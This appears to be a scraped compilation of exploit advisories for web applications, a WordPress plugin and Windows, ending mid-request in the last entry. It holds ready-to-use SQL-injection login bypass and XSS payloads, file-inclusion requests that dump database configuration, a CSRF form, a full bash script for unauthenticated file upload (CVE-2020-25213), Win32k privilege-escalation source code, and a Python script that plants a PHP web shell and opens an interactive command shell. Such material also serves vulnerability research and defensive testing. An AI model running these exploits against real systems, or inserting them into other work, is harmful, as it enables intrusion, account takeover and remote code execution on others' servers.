ISHACK AI BOT

# Exploit Title: WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass # Date: 18-11-2020 # Exploit Author: Aakash Madaan # Vendor Homepage: https://webdamn.com/ # Software Link : https://webdamn.com/user-management-system-with-php-mysql/ # Version: N/A (Default) # Tested on: Windows 10 professional Steps to reproduce: 1. Open user login page using following URl: -> http://localhost/login.php <http://localhost/login.html> 2. If attacker get access to valid email address ( leaked data or by any other means) then he/she can use the email address as follows: Payload: <email>' OR '1'='1 NOTE: Use the above payload in both username and password fields 3. Server accepts the payload and the attacker is able to bypass the user login panel with only email address.

#Exploit Title: Anuko Time Tracker 1.19.23.5311 - Password Reset Vulnerability leading to Account Takeover #Date: 2020-11-11 #Exploit Author: Mufaddal Masalawala #Vendor Homepage: https://www.anuko.com/ #Software Link: https://www.anuko.com/time-tracker/index.htm #Version: 1.19.23.5311 #Tested on: Kali Linux 2020.3 #CVE: CVE-2020-27422 #Proof Of Concept: In Anuko Time Tracker v1.19.23.5311 and prior, the password reset link emailed to the user doesn't expire once used, hence the attacker could use the same link to take over the victim's account. An Attacker needs to have the link for successful exploitation. A malicious user could use the same password reset link of the victim multiple times to take over the account. To exploit this vulnerability: 1. Goto 'Password Reset' module and enter any user's login name 2. Reset the password using the password reset link received in the email 3. Use the same link again after resetting the password once 4. Password is changed again using the previously used link.

#Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS) #Date: 2020- 10- 29 #Exploit Author: Mufaddal Masalawala #Vendor Homepage: https://churchcrm.io/ #Software Link: https://github.com/ChurchCRM/CRM #Version: 4.2.1 #Tested on: Kali Linux 2020.3 #Proof Of Concept: ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability: 1. Login to the application, go to 'View all Deposits' module. 2. Add the payload ( <script>var link = document.createElement('a'); link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe'; link.download = ''; document.body.appendChild(link); link.click(); </script> ) in the 'Deposit Comment' field and click "Add New Deposit". 3. Payload is executed and a .exe file is downloaded.

#Exploit Title: Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality #Date: 2020-11-11 #Exploit Author: Mufaddal Masalawala #Vendor Homepage: https://www.anuko.com/ #Software Link: https://www.anuko.com/time-tracker/index.htm #Version: 1.19.23.5311 #Tested on: Kali Linux 2020.3 #CVE: CVE-2020-27423 #Proof Of Concept: Anuko Time Tracker v1.19.23.5311 and prior, lacks rate limit on the password reset module which allows attackers to perform Denial of Service attack on any legitimate user's mailbox. Attacker could perform Denial of Service on a legitimate user's mailbox To exploit this vulnerability: 1. Goto 'Password Reset' module and enter any user's login name 2. Click on 'Reset Password' and capture this request. 3. Replay this request n number of times. 4. The victim receives a password reset email the number of times the request is replayed.

# Exploit Title: Car Rental Management System 1.0 - SQL Injection / Local File include # Date: 22-10-2020 # Exploit Author: Mosaaed # Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: parrot + Apache/2.4.46 (Debian) SQL Injection #Vulnerable Page: http://localhost/carRental/index.php?page=view_car&id=4 #POC 1: http://localhost/carRental/index.php?page=view_car&id=-4+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10+from+users-- LFI #Vulnerable Page1: http://localhost/carRental/index.php?page=about #Vulnerable Page2:http://localhost/carRental/admin/index.php?page=movement #POC 1: http://localhost/carRental/index.php?page=php://filter/convert.base64-encode/resource=home #POC 2:http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect note POC 2 reading database information #example : curl -s -i POST http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect | grep view-panel -A 1 #result <main id="view-panel" > PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjYXJfcmVudGFsX2RiJylvciBkaWUoIkNvdWxkIG5vdCBjb25uZWN0IHRvIG15c3FsIi5teXNxbGlfZXJyb3IoJGNvbikpOw0K #proof of concept picture https://ibb.co/8Dd7d9G

# Exploit Title: Mitel mitel-cs018 - Call Data Information Disclosure # Date: 2003-07-28 # Exploit Author: Andrea Intilangelo (acme olografix / paranoici) # Vendor Homepage: www.mitel.com # Version: mitel-cs018 # Tested on: Windows, Linux There is an interesting bug in a Mitel's servers for Voice over IP that allows to discover the numbers called and the numbers calling trought this dhcp server. This server is configurable via http interface and via telnet; in this case, if there is a call at moment of login/pass request, I've noted this: Trying 192.168.1.2... Connected to 192.168.1.2. Escape character is '^]'. Username: mitel-cs018 Password: ERROR: Invalid Username/Password pair Username: Password: Username: ^X^W^E^Q^W Password: ERROR: Invalid Username/Password pair Username: Password: ERROR: Invalid Username/Password pair # in this moment a foreign call arrive from outside Username: 155 OGIN 149 11:11:55 D 2 156 ICIN 11:12: 6 D 4 0xxxXxxxxx 157 XFIC 156 11:12: 6 151 0: 9:47 D 3 158 ICIN 11:12: 6 D 3 0xxxXxxxxx 159 ANSW 146 11:12:11 0: 0: 9 D 4 160 HDIN 146 11:12:21 D 4 162 HREC 146 11:12:27 0: 0: 6 D 4 163 ABND ? 11:12:37 0: 0:37 D 3 0xxxXxxxxx 164 ICIN 11:12:43 D 3 0xxxXxxxxx 165 EXIC 146 11:12:54 0: 0:47 D 4 166 ANSW 146 11:13: 0 0: 0:16 D 3 167 HDIN 146 11:13: 6 D 3 169 EXIC 146 11:13:13 156 0: 0:12 D 3 171 EXOG 149 11:13:46 0: 1:59 D 2 0xxXxxxxx 172 XFIC 156 11:16:53 146 0: 3:40 D 3 # where "0xxXxxxxx" are telephone numbers A derives table results is: SEQ CODE EXT ACC TIME RX TX DURATION LN DIALLED DIGITS COST No. No. COD HH:MM:SS FROM TO HH:MM:SS No. ___ _____ ____ ____ ________ ____ ____ ____________ ______________ _______

# Exploit Title: Simple College Website 1.0 - 'page' Local File Inclusion # Date: 30-10-2020 # Exploit Author: mosaaed # Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-college-website.zip # Version: 1.0 # Tested on: Parrot 5.5.17 + version: Apache/2.4.46 (Debian) # CVE ID : N/A # Local File Inclusion #parameter Vulnerable: page #Request GET /college_website/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=7ls9j695lglc2eah5khecv2g66 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 #Response HTTP/1.1 200 OK Date: Sat, 31 Oct 2020 02:49:31 GMT Server: Apache/2.4.46 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 15674 Connection: close Content-Type: text/html; charset=UTF-8 <main class=""> PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjb2xsZWdlX3dlYnNpdGVfZGInKW9yIGRpZSgiQ291bGQgbm90IGNvbm5lY3QgdG8gbXlzcWwiLm15c3FsaV9lcnJvcigkY29uKSk7DQo= </main>

# Exploit Title: User Registration & Login and User Management System 2.1 - Cross Site Request Forgery # Exploit Author: Dipak Panchal(th3.d1p4k) # Vendor Homepage: https://phpgurukul.com # Software Link: http://user-registration-login-and-user-management-system-with-admin-panel # Version: 5 # Tested on Windows 10 Attack Vector: An attacker can craft HTML page containing POST information to have the victim sign into an attacker's account, where the victim can add information assuming he/she is logged into the correct account, where in reality, the victim is signed into the attacker's account where the changes are visible to the attacker. Exploit: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/loginsystem/" method="POST"> <input type="hidden" name="uemail" value="[email protected]" /> <input type="hidden" name="password" value="User@1234" /> <input type="hidden" name="login" value="LOG&#32;IN" /> <input type="submit" value="Submit request" /> </form> </body> </html> Mitigation: Please add a csrf token to login request or make some type prompt that the session has ended when the new login from attacker occurs.

# Exploit Title: WordPress Plugin Wp-FileManager 6.8 - RCE # Date: September 4,2020 # Exploit Author: Mansoor R (@time4ster) # CVE: CVE-2020-25213 # Version Affected: 6.0 to 6.8 # Vendor URL: https://wordpress.org/plugins/wp-file-manager/ # Patch: Upgrade to wp-file-manager 6.9 (or above) # Tested on: wp-file-manager 6.0 (https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip) on Ubuntu 18.04 #!/bin/bash #Description: #The core of the issue began with the File Manager plugin renaming the extension on the elFinder library’s connector.minimal.php.dist file to .php so it could be executed directly, even though the connector file was not used by the File Manager itself. Such libraries often include example files that are not intended to be used “as-is” without adding access controls, and this file had no direct access restrictions, meaning the file could be accessed by anyone. This file could be used to initiate an elFinder command and was hooked to the elFinderConnector.class.php file #Using connector.minimal.php file attacker can upload arbitrary file to the target (unauthenticated) & thus can achieve Remote code Execution. #Patch commit details: # https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2373068%40wp-file-manager%2Ftrunk&old=2372895%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail= #Reference #https://nvd.nist.gov/vuln/detail/CVE-2020-25213 #Credits: #1. https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/ #2. https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/ ##WARNINGS: #Only test the exploit on websites you are authorized to. #Don't upload reverse shell payloads or any files that can cause harm to organization. #Also note that the uploaded files can be accessed by anyone unless secured by password. ## Usage: # ======== # root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress --check # # ============================================================================================ # wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213] # # By: Mansoor R (@time4ster) # ============================================================================================ # # [+] Found wp-file-manager version: 6.0 # [+] Version appears to be vulnerable # [+] Target: http://192.168.1.54/wordpress is vulnerable # # root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress -f /tmp/mypoc.php --verbose # # ============================================================================================ # wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213] # # By: Mansoor R (@time4ster) # ============================================================================================ # # curl POC : # curl -ks --max-time 5 --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" -F "upload[]=@//tmp/mypoc.php" "http://192.168.1.54/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" # # [+] W00t! W00t! File uploaded successfully. # Location: /wordpress/wp-content/plugins/wp-file-manager/lib/php/../files/mypoc.php # Exploit #========== echo echo "============================================================================================" echo "wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]" echo echo "By: Mansoor R (@time4ster)" echo "============================================================================================" echo function printHelp() { echo -e " Usage: -u|--wp_url <string> Wordpress target url -f|--upload_file <string> Absolute location of local file to upload on the target. (relative path will not work) -k|--check Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded. -v|--verbose Also prints curl command which is going to be executed -h|--help Print Help menu Example: ./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check ./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose " } check="false" verbose="false" #Processing arguments while [[ "$#" -gt 0 ]] do key="$1" case "$key" in -u|--wp_url) wp_url="$2" shift shift # past argument ;; -f|--upload_file) upload_file="$2" shift shift ;; -k|--check) check="true" shift shift ;; -v|--verbose) verbose="true" shift ;; -h|--help) printHelp exit shift ;; *) echo [-] Enter valid options exit ;; esac done [[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL." && exit [[ -z "$upload_file" ]] && [[ "$check" == "false" ]] && echo "[-] Either supply --upload_file or --check" && exit [[ -n "$upload_file" ]] && [[ ! -s "$upload_file" ]] && echo "[-] File supplied is either empty or not exist." && exit #Script have dependency on jq jq_cmd=$(command -v jq) [[ -z "$jq_cmd" ]] && echo -e "[-] Script have dependency on jq. Insall jq from your package manager.\nFor debian based distro install using command: apt install jq" && exit function checkWPFileManagerVersion() { #Takes 1 argument: url declare url="$1" declare target_endpoint="$url/wp-content/plugins/wp-file-manager/readme.txt" declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" declare is_vulnerable="true" #declare response=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i "Stable tag: ") declare version=$( curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -A 5 "== Changelog ==" | grep -E -o "[0-9]\.[0-9]" | head -n 1 ) if [ -n "$version" ];then #declare version=$(echo "$response" | awk {'print $3'}) echo "[+] Found wp-file-manager version: $version" patched_version="6.9" #if [ $(awk 'BEGIN {print ('$version' > '6.9'}') ]; then smaller_version=$(echo -e "$version\n$patched_version" | sort -n | head -n 1) if [ "$version" != "$patched_version" ] && [ "$smaller_version" == "$version" ];then echo "[+] Version appears to be vulnerable" else echo "[-] Version don't appears to be vulnerable" is_vulnerable=false fi else echo "[-] Unable to detect version. May be wp-file-manager plugin not installed." is_vulnerable=false fi if [ "$is_vulnerable" == "false" ]; then echo -n "Do you still want to continue (y/N) : " read choice [[ "$choice" == "y" ]] || [[ "$choice" == "Y" ]] && echo && return exit fi } function checkWPFileManager() { #Takes 1 argument: url declare url="$1" #Checking wp-file-manager plugin version: checkWPFileManagerVersion "$url" declare target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" declare response=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint") #echo "$response" #{"error":["errUnknownCmd"]} is returned when vulnerable endpoint is hit declare is_vulnerable=$(echo "$response" | grep "\{\"error\":\[\"errUnknownCmd\"\]\}") [[ -n "$is_vulnerable" ]] && echo "[+] Target: $url is vulnerable" [[ -z "$is_vulnerable" ]] && echo "[-] Target: $url is not vulnerable" } function exploitWPFileManager() { #Takes 3 arguments: url & file_upload & verbose(true/false) declare url="$1" declare file_upload="$2" declare verbose="$3" declare target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" if [ "$verbose" == "true" ];then echo "curl POC :" echo "curl -ks --max-time 5 --user-agent \"$user_agent\" -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\" -F \"mtime[]=1576045135\" -F \"upload[]=@/$file_upload\" \"$target_endpoint\" " echo fi response=$(curl -ks --max-time 5 --user-agent "$user_agent" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" \ -F "upload[]=@/$file_upload" \ "$target_endpoint" ) #echo "$response" file_upload_url=$(echo "$response" | jq -r .added[0].url 2>/dev/null) [[ -n "$file_upload_url" ]] && echo -e "[+] W00t! W00t! File uploaded successfully.\nLocation: $file_upload_url " [[ -z "$file_upload_url" ]] && echo "[-] File upload failed." } [[ "$check" == "true" ]] && checkWPFileManager "$wp_url" [[ -s "$upload_file" ]] && exploitWPFileManager "$wp_url" "$upload_file" "$verbose" echo

# Exploit Title: Microsoft Windows - Win32k Elevation of Privilege # Author: nu11secur1ty # Date: 08.03.2020 # Exploit Date: 01/14/2020 # Vendor: Microsoft # Software Link: https://support.microsoft.com/en-us/help/3095649/win32k-sys-update-in-windows-october-2015 # Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/raw/master/Undefined/CVE-2020-0624/win32k/__32-win32k.sys5.1.2600.1330.zip # CVE: CVE-2020-0642 [+] Credits: Ventsislav Varbanovski (nu11secur1ty) [+] Source: readme from GitHUB [Exploit Program Code] // cve-2020-0624.cpp #pragma warning(disable: 4005) #pragma warning(disable: 4054) #pragma warning(disable: 4152) #pragma warning(disable: 4201) #include <Windows.h> #include "ntos.h" typedef NTSTATUS(NTAPI* PFNUSER32CALLBACK)(PVOID); HWND hParent{}, hChild{}; BOOL Flag1{}, Flag2{}; PFNUSER32CALLBACK OrgCCI2{}, OrgCCI3{}; NTSTATUS NTAPI NewCCI2(PVOID Param) { if (Flag1) { Flag1 = FALSE; Flag2 = TRUE; DestroyWindow(hParent); } return OrgCCI2(Param); } NTSTATUS NTAPI NewCCI3(PVOID Param) { if (Flag2) { ExitThread(0); } return OrgCCI3(Param); } int main() { DWORD OldProtect{}; PTEB teb = NtCurrentTeb(); PPEB peb = teb->ProcessEnvironmentBlock; PVOID pCCI2 = &((PVOID*)peb->KernelCallbackTable)[2]; if (!VirtualProtect(pCCI2, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect)) return 0; OrgCCI2 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI2, &NewCCI2); PVOID pCCI3 = &((PVOID*)peb->KernelCallbackTable)[3]; if (!VirtualProtect(pCCI3, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect)) return 0; OrgCCI3 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI3, &NewCCI3); hParent = CreateWindow(L"ScrollBar", L"Parent", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, NULL, NULL, NULL); hChild = CreateWindow(L"ScrollBar", L"Child", WS_OVERLAPPEDWINDOW | WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, 0, NULL, NULL); Flag1 = TRUE; SendMessage(hChild, WM_LBUTTONDOWN, 0, 0); return 0; } [Vendor] Microsoft [Vulnerability Type] Privilege Escalation [Description] The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE. - - - more: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0642 [Disclosure Timeline] An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. The update addresses this vulnerability by correcting how Win32k handles objects in memory. [+] Disclaimer The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

# Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution # Exploit Author: Valerio Alessandroni # Date: 2020-10-07 # Vendor Homepage: https://projectworlds.in/ # Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/ # Source Link: https://github.com/projectworldsofficial/online-matrimonial-project-in-php # Version: 1.0 # Tested On: Server Linux Ubuntu 18.04, Apache2 # Version: Python 2.x # Impact: Code Execution # Affected components: Affected move_uploaded_file() function in functions.php file. # Software: Marital - Online Matrimonial Project In PHP version 1.0 suffers from a File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. # Attack vector: An authenticated (you can register a user for free) not privileged user is able to upload arbitrary file in the upload form used to send profile pics, if the file is a PHP script, it can be executed. # # Additional information: # # To exploit this vulnerability: # 1) register a not privileged user at /register.php # 2) login in the application /login.php # 3) keep note of the redirect with the GET 'id' parameter /userhome.php?id=[ID] # 4) go to the page /photouploader.php?id=[ID] # 5) upload an arbitrary file in the upload form, in my example, I used a file called shell.php with the content of "<?php system($_GET['cmd']); ?>" # 6) An error will occurr, but the file is correctly uploaded at /profile/[ID]/shell.php # 7) run command system command through /profile/[ID]/shell.php?cmd=[COMMAND] # # How to use it: # python exploit.py [URL] [USERNAME] [PASSWORD] import requests, sys, urllib, re, time from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) def webshell(SERVER_URL, ID, FILE_NAME): try: print(Fore.YELLOW+'[+] '+Fore.RESET+'Connecting to webshell...') time.sleep(1) WEB_SHELL = SERVER_URL+'profile/'+ID+'/'+FILE_NAME getCMD = {'cmd': 'echo ciao'} r2 = requests.get(WEB_SHELL, params=getCMD) status = r2.status_code if status != 200: print(Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') while True: inputCMD = raw_input('$ ') command = {'cmd': inputCMD} r2 = requests.get(WEB_SHELL, params=command, verify=False) print r2.text except: print("\r\nExiting.") sys.exit(-1) def printHeader(): print(Fore.GREEN+"___ ___ _ _ _ "+Fore.RED+" ______ _____ _____") print(Fore.GREEN+"| \/ | (_)| | | |"+Fore.RED+" | ___ \/ __ \| ___|") print(Fore.GREEN+"| . . | __ _ _ __ _ | |_ __ _ | |"+Fore.RED+" | |_/ /| / \/| |__ ") print(Fore.GREEN+"| |\/| | / _` || '__|| || __|/ _` || |"+Fore.RED+" | / | | | __| ") print(Fore.GREEN+"| | | || (_| || | | || |_| (_| || |"+Fore.RED+" | |\ \ | \__/\| |___ ") print(Fore.GREEN+"\_| |_/ \__,_||_| |_| \__|\__,_||_|"+Fore.RED+" \_| \_| \____/\____/ ") print '' if __name__ == "__main__": printHeader() if len(sys.argv) != 4: print (Fore.YELLOW+'[+] '+Fore.RESET+"Usage:\t python %s [URL] [USERNAME] [PASSWORD]" % sys.argv[0]) print (Fore.YELLOW+'[+] '+Fore.RESET+"Example:\t python %s https://192.168.1.1:443/marital/ Thomas password1234" % sys.argv[0]) sys.exit(-1) SERVER_URL = sys.argv[1] SERVER_URI = SERVER_URL + 'auth/auth.php' LOGIN_PARAMS = {'user': '1'} LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'} req = requests.post(SERVER_URI, params=LOGIN_PARAMS, data=LOGIN_DATA, verify=False) print(Fore.YELLOW+'[+] '+Fore.RESET+'logging...') time.sleep(1) for resp in req.history: COOKIES = resp.cookies.get_dict() SPLITTED = resp.headers["location"].split("=") ID = SPLITTED[1] print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully retrieved user [ID].') time.sleep(1) SERVER_URI = SERVER_URL + 'photouploader.php' LOGIN_PARAMS = {'id': ID} LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'} FILE_NAME = 'shell.php' FILES = {'pic1': (FILE_NAME, '<?php system($_GET[\'cmd\']); ?>'), 'pic2': ('', ''), 'pic3': ('', ''), 'pic4': ('', '')} req = requests.post(SERVER_URI, params=LOGIN_PARAMS, files=FILES, cookies=COOKIES, verify=False) print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully uploaded.') time.sleep(1) webshell(SERVER_URL, ID, FILE_NAME)

# Exploit Title: Coastercms 5.8.18 - Stored XSS # Exploit Author: Hardik Solanki # Vendor Homepage: https://www.coastercms.org/ # Software Link: https://www.coastercms.org/ # Version: 5.8.18 # Tested on Windows 10 XSS IMPACT: 1: Steal the cookie 2: User redirection to a malicious website Vulnerable Parameters: Edit Page tab Steps to reproduce: 1: Navigate to "http://localhost/admin/login" and log in with admin credentials. 2:- Then after login navigates to "Page --> Homepage --> Our Blog" and click on the edit page. 3: Then add the payload "<script>alert(123)</script>" & Payload "<h1>test</h1>", and cliock on update button. Saved succesfully. 4: Now, click on "View live page" and it will redirect you to the live page at "http://localhost/homepage/blog" and XSS will get stored and trigger on the main home page

# Exploit Title: EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass # Date: 02-12-2020 # Exploit Author: Mayur Parmar(th3cyb3rc0p) # Vendor Homepage: http://egavilanmedia.com # Software Link : http://egavilanmedia.com/egm-address-book/ # Version: 1.0 # Tested on: PopOS Attack Vector: An attacker can gain admin panel access using malicious sql injection queries. Steps to reproduce: 1. Open admin login page using following URl: -> http://localhost/Address%20Book/login.php 2. Now put below Payload in both the fields( User ID & Password) Payload: admin' or '1'='1 3. Server accepted our payload and we bypassed cpanel without any credentials

# Exploit Title: mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting # Date: 3-12-2020 # Exploit Author: Sagar Banwa # Vendor Homepage: https://mojoportal.com # Software Link: https://www.mojoportal.com/download # Version: 2.7.0.0 # Tested on: Windows 10/Kali Linux Attack vector: This vulnerability can results attacker to inject the XSS payload in Add Forum title section and each time admin visits the View Detail of Forum section from admin panel, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Edit Forum 'Title :'. Steps-To-Reproduce: 1. Login to the Admin Account 2. Go to the Forums. 3. click on Add Forum. 4. Add payload to Title: <script>alert(1)</script> 5. Click on Create New Forum. 6. As soon as admin or any visitor visit the forum the XSS payload will triage. Post Request - ''' POST /Forums/EditForum.aspx?mid=1275&pageid=756 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://localhost/Forums/EditForum.aspx?mid=1275&pageid=756 Content-Type: application/x-www-form-urlencoded Content-Length: 5037 Origin: https://localhost Connection: close Cookie: ASP.NET_SessionId=[removed]; _ga=GA1.2.1772464100.1606932969; _gid=GA1.2.1379348562.1606932969; returnurl25=https://localhost/; .mojochangeme=7ECC859CF4455C5CAE01964464A1029D676213BFF565B38E31D6AE3CF45C212B26FEF4451D2565510EFC1FBEE1A0002322CB05C272CFF74A5F2BDD798286542EA2BC30A889ABDC6D74502865A66DECF250F715A55C510F2DFDBCA1865D3DF436DA579221; localhostportalroles25=3119B16DC158DE7032105189AE61DB79F7043A498D422DABE9485B15E18E299E5C3B1C0696B736560172F2435276EF79EBF5D93A714F285B6EAEB16B648CB2EA4C7AE691B25D00EF4AD168393EFB423ED302A355C340B5D11AA9C7F44BDA6767678C3212BAA3B2991B38D1971836A62C0A1E2EF7AA36FE5DFE1BDAFF077F785F74B360520BA5793271671755790ED2BB9E98199A; fwAdminDrawer=close; _gat=1 Upgrade-Insecure-Requests: 1 __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATEFIELDCOUNT=7&__VIEWSTATE=8GbpJWPoYrikzpEsM5g5Oyxg%2Fw3otQN%2Bp%2FxL2%2BIM8Cb0gFtj%2BUt4LWZm2SnDpq2wFeoZ5CxcLmEwnfTYfX3zUCO8ullGYZmsvrRPgkCmd4Q8Ziuu9bC6xpnpvd3zY2u2%2FmkVsmTINB4RJfAFk%2FM2RGngO7YcBtMIdKm1B0Mca3Lzwk9SbGZ%2BrkzOKF%2FMw%2Fev0rDciq1cZ2EfgKa6cfHhN9Rdo1CK3u%2FaGhGTXDMq4kgcV8VmtKYzMd60hoYTtdj%2B6xVyW2kJ0W6uYuzNZy4ctGRethu2TDkK%2Bp3Jt69X2iL07JQmXYFL4Nouh%2FF5nR3dDnhT50x%2F7ezT%2BRKLpwnBPrqE2XRgsR9eCwyV59d6NIxNos6fD3rYmhRgONXeinpuRxe8AFElCPOnFXJz7nhtBNkUx9xl2jx95l6CS7wE8wQtFQc5PWUlJ7r1junVJ5oUmFhLEjDXn7qJ%2Fn9kBHDzTjYI7Epq%2Fo8uS9FRO0PeNyQLqUlRW5Ig&__VIEWSTATE1=xhUOYE%2FB05kVdGbeLy9qSX0k5X6mJ0pwbklHcDgNHAdlV6yKobnEZLVzA11ZLSVTDLlg1anxthz4S3MKQLjEcxWd8EbQ6TFFyuR4Ey6ZQlHXc4YXVzaRdBe8XPsfbZrh6fqBJab90XjGQZoAMeE3mDqXVKo7oeA5YpZn4bfBHNxj8el8vs%2B5QbAD5INtXMzVMLrtoNxHRlPjtn7u2LiRHXS7mal7GPJ2RD48rh1sEBkohr91gAxGBLdl3H3rT%2Fo1ACtQU8sNRceeV1XhgEbjPyweu6L2FPtyWxyQXma76osWfXkftyt3dloWIywM201r3ByGOAxR%2BtpFpj3IwIoyEJvvUnJ3UcteS6DiG2QqebBaVAl%2B4NzTAhMOg3%2FX%2Fa5%2BZC8lZ71yf8U5GF58DcCEI36PvnQOlKlKuO2CsO0iOTXf8UYirVNV%2F6qqgwru0P5HhCulGGM%2BTrUswOWEZYkMzoyjeRwt54PUOKaAllJrYBy4UwYjs7Ma&__VIEWSTATE2=ME%2FnWlF9Jj7LFvrQ3J6B24%2FZAdATYRBm7MuM%2FZQ%2B2ft4PF%2BONy1JWKH%2F46T%2BS9ni%2FjOnj8TN9ACNlJlfGkhfmhXBCBaLpf5o2h58ucOACihtCaSmjixiv%2B1SM7DKYp3l3SRp0DrHZWLy9bHZIV1qFNOyudHvIMHy8mYC5dlH5vvFVcDC%2BZeAbCbOe